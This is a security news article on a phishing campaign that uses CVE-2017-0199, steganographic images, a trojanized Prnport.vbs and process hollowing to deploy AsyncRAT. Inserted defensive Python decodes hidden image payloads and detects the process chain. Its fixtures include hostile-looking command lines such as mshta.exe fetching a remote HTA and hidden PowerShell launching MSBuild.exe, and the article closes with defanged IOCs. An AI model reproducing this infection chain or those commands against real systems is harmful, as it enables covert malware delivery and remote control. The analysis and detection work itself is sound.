Cyber Security News

New Steganography Campaign Exploits MS Office Vulnerability to Distribute AsyncRAT

A recently uncovered cyberattack campaign has brought steganography back into the spotlight, showcasing the creative and insidious methods attackers employ to deliver malware.

This operation, dubbed the “Stego-Campaign,” exploits a known Microsoft Office vulnerability, CVE-2017-0199, to initiate infections and ultimately deploy the notorious AsyncRAT malware.

Innovative Attack Leverages Hidden Payloads in Images

The vulnerability, first reported in April 2017, enables remote code execution (RCE) without user interaction beyond opening a malicious document, making it a potent entry point for phishing-based attacks.

The attack begins with a phishing email containing a malicious Microsoft Office document that exploits CVE-2017-0199.

[Figure: Stego-Campaign flow]

Once opened, the document triggers the download of a malicious HTA script, which in turn fetches a trojanized version of Prnport.vbs, a legitimate Windows script for managing printer ports.

This tampered script constructs and executes a PowerShell command to download an injector DLL hidden within an innocuous-looking image file using steganography.

Sophisticated Payload Delivery via Trojanized Scripts and Process Hollowing

The Base64-encoded injector is embedded between specific marker strings inside the image file's bytes, and can be carved out and decoded with a tool such as CyberChef.

Analysis shows the injector is a 32-bit .NET DLL (confirmed with tools like Detect It Easy and CFF Explorer) whose original namespace is Microsoft.Win32.TaskScheduler.

The PowerShell script dynamically loads this injector via reflection, invoking a method named “VAI” to retrieve the final payload URL, which points to a reversed, Base64-encoded AsyncRAT binary.
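The two decoding steps described above (carving a Base64 blob from between markers in an image file, and undoing a reversed Base64 string) are simple enough to automate for triage. The following Python is an added example for analysts and is not code from the article or from the campaign; the marker strings, the sample "image" bytes, the stand-in DLL and the URL are all constructed here, since the article does not publish the real markers. Beyond the specific case in the text, it also includes a marker-agnostic fallback that looks for any unusually long Base64 run, which is how a defender would check an image when the markers are unknown.

```python
import base64
import re

# Marker strings are an assumption for this example; the article does not
# publish the markers the campaign actually used.
START_MARKER = b"<<BASE64_START>>"
END_MARKER = b"<<BASE64_END>>"

# Runs of Base64 alphabet this long rarely occur in genuine image data, so they
# are worth inspecting even when the markers are unknown.
BASE64_RUN = re.compile(rb"[A-Za-z0-9+/]{100,}={0,2}")


def extract_between_markers(data: bytes, start: bytes = START_MARKER, end: bytes = END_MARKER):
    """Return the bytes between the two markers, or None if either is absent."""
    s = data.find(start)
    if s == -1:
        return None
    s += len(start)
    e = data.find(end, s)
    if e == -1:
        return None
    return data[s:e].strip()


def find_base64_runs(data: bytes):
    """Marker-agnostic fallback: every long Base64-looking run in the file."""
    return [m.group(0) for m in BASE64_RUN.finditer(data)]


def decode_base64(blob: bytes) -> bytes:
    # validate=True rejects stray bytes instead of silently skipping them.
    return base64.b64decode(blob, validate=True)


def looks_like_pe(data: bytes) -> bool:
    """A Windows DLL or EXE starts with the 'MZ' DOS header signature."""
    return data[:2] == b"MZ"


def decode_reversed_base64(text: str) -> str:
    """The script reverses the string before Base64-decoding it; undo both."""
    return base64.b64decode(text[::-1]).decode("utf-8")


def analyze_image(data: bytes) -> dict:
    """Summarize what a hidden-payload check finds in one image file."""
    blob = extract_between_markers(data)
    if blob is None:
        runs = find_base64_runs(data)
        blob = max(runs, key=len) if runs else None
    result = {"payload_found": blob is not None, "is_pe": False, "size": 0}
    if blob is not None:
        try:
            payload = decode_base64(blob)
        except ValueError:
            return result
        result["is_pe"] = looks_like_pe(payload)
        result["size"] = len(payload)
    return result


# --- Constructed sample data (not from the campaign) ---
# A stand-in DLL: DOS header signature followed by filler bytes.
FAKE_DLL = b"MZ" + b"\x90" * 120 + b"This program cannot be run in DOS mode."
# A minimal JPEG-like container: SOI marker, some non-Base64 bytes, the hidden
# blob between the markers, then the EOI marker.
SAMPLE_IMAGE = (
    b"\xff\xd8\xff\xe0" + b"\x00\x10JFIF\x00" + b"\x01\x02\x03" * 8
    + START_MARKER + base64.b64encode(FAKE_DLL) + END_MARKER
    + b"\xff\xd9"
)
# A payload URL carried the way the script carries it: Base64-encoded, then reversed.
EXAMPLE_URL = "https://payload.example.invalid/001.txt"
REVERSED_URL = base64.b64encode(EXAMPLE_URL.encode()).decode()[::-1]

if __name__ == "__main__":
    print(analyze_image(SAMPLE_IMAGE))
    print(decode_reversed_base64(REVERSED_URL))
```

Run it against a real suspect file by passing the file's bytes to analyze_image; a result with is_pe set is a strong sign the image is a carrier rather than a picture.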

The payload is decoded, and through a technique known as process hollowing (T1055.012), it is injected into a legitimate MSBuild.exe process, allowing the malware to run covertly under a trusted process name.

[Figure: The process hollowing flow used in this attack]

AsyncRAT, an open-source remote access tool released in 2019, provides attackers with capabilities like remote desktop access, keylogging, and the ability to deploy additional malware such as ransomware.

This campaign’s use of steganography to conceal malicious code within images exemplifies the lengths to which threat actors go to evade detection.

After invoking the VAI method, the PowerShell script reverses and decodes the payload URL, fetches the AsyncRAT binary, and employs process hollowing to execute it stealthily.

The final payload, flagged by VirusTotal, includes a configuration file revealing the command-and-control (C2) IP address, underscoring the sophisticated infrastructure behind the attack.

Steganography, while not commonly seen in the wild, remains a fascinating and dangerous technique that challenges traditional defense mechanisms, as the hidden payloads are difficult to detect without specialized analysis.

Defenders must familiarize themselves with such attack flows to mitigate similar threats effectively, focusing on phishing prevention, endpoint monitoring for suspicious process behavior, and anomaly detection in network traffic.
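The process chain the article describes (Office document, then mshta.exe, then a script host running a relocated prnport.vbs, then PowerShell launching MSBuild.exe) is unusual enough that endpoint telemetry can flag each hop. The following Python is an added example of that kind of process-behaviour check and is not code from the article; the process-creation records are constructed for the example, and the rule that prnport.vbs normally lives under Printing_Admin_Scripts is a general Windows fact rather than something the article states.

```python
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (constructed for this example)."""
    pid: int
    ppid: int
    image: str      # executable name, lowercase
    cmdline: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# The genuine prnport.vbs ships under System32\Printing_Admin_Scripts; a copy
# run from anywhere else is suspect.
LEGIT_PRNPORT_DIR = "\\printing_admin_scripts\\"


def detect_stego_chain(events: List[ProcEvent]) -> List[str]:
    """Return one finding per event that matches a stage of the attack chain."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings: List[str] = []
    for e in events:
        parent = by_pid.get(e.ppid)
        parent_image = parent.image if parent else ""
        cmd = e.cmdline.lower()

        # Stage 1: an Office document handing off to mshta.exe (HTA download).
        if e.image == "mshta.exe" and parent_image in OFFICE_APPS:
            findings.append(f"pid {e.pid}: {parent_image} spawned mshta.exe")

        # Stage 2: prnport.vbs launched by mshta.exe or from outside its normal directory.
        if e.image in SCRIPT_HOSTS and "prnport.vbs" in cmd:
            if parent_image == "mshta.exe" or LEGIT_PRNPORT_DIR not in cmd:
                findings.append(
                    f"pid {e.pid}: prnport.vbs run outside its normal context "
                    f"(parent {parent_image or 'unknown'})"
                )

        # Stage 3: PowerShell launching MSBuild.exe, the process hollowing target.
        if e.image == "msbuild.exe" and parent_image in SHELLS:
            findings.append(f"pid {e.pid}: {parent_image} spawned MSBuild.exe")
    return findings


# --- Constructed telemetry (not from the campaign) ---
MALICIOUS_CHAIN = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "winword.exe", 'winword.exe /n "C:\\Users\\victim\\Downloads\\invoice.docx"'),
    ProcEvent(300, 200, "mshta.exe", "mshta.exe https://stage.example.invalid/x.hta"),
    ProcEvent(400, 300, "wscript.exe", 'wscript.exe "C:\\Users\\victim\\AppData\\Local\\Temp\\prnport.vbs"'),
    ProcEvent(500, 400, "powershell.exe", "powershell.exe -w hidden -nop -c (constructed)"),
    ProcEvent(600, 500, "msbuild.exe", "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe"),
]

BENIGN_ACTIVITY = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(110, 100, "winword.exe", 'winword.exe /n "C:\\Users\\admin\\report.docx"'),
    ProcEvent(120, 100, "cmd.exe", "cmd.exe"),
    ProcEvent(130, 120, "cscript.exe",
              'cscript.exe "C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnport.vbs" -l'),
    ProcEvent(140, 100, "devenv.exe", "devenv.exe"),
    ProcEvent(150, 140, "msbuild.exe", "MSBuild.exe MyProject.sln"),
]

if __name__ == "__main__":
    for finding in detect_stego_chain(MALICIOUS_CHAIN):
        print(finding)
    print("benign findings:", detect_stego_chain(BENIGN_ACTIVITY))
```

The three stages are evaluated independently so that a partial chain (for instance, only the PowerShell to MSBuild hop) still produces an alert; in practice each rule maps onto a process-creation query in whatever EDR or Sysmon pipeline is in place.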

Indicators of Compromise (IOC)

Trojanized Prnport.vbs (SHA256): 1105ae14ccb41fedcf556e4c575e34e505e9a571f2021ba89a75fbe5fa12e3c0
AsyncRAT Delivery URL: hxxps[://]watchonlinehotvideos[.]site/001[.]txt
AsyncRAT (SHA256): 448ae5b8890c17a2efe49856531efd62796db52d2ff0ecbb4678334aea2bf776
AsyncRAT C2 Address: 148[.]113[.]214[.]176
Injector Delivery URL: hxxps[://]1019[.]filemail[.]com/api/file/get?filekey=ZrKTNo-_DMWgm0oonSr97JAkdrUqbICVeG2LmuclzuON2ZavKqsQg0NqChSLT4A&pk_vid=342803d1cc4e3b801741606974b78eb
Injector (Namespace): Microsoft.Win32.TaskScheduler
Injector Binary (SHA256): 8CC93827CA7652AFC8E08B9266F6567D06B932AF26B601EB7FDE10F5E5A6CB30
Injected Process Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe


Aman Mishra

Aman Mishra is a security and privacy reporter covering data breaches, cyber crime, malware, and vulnerabilities.
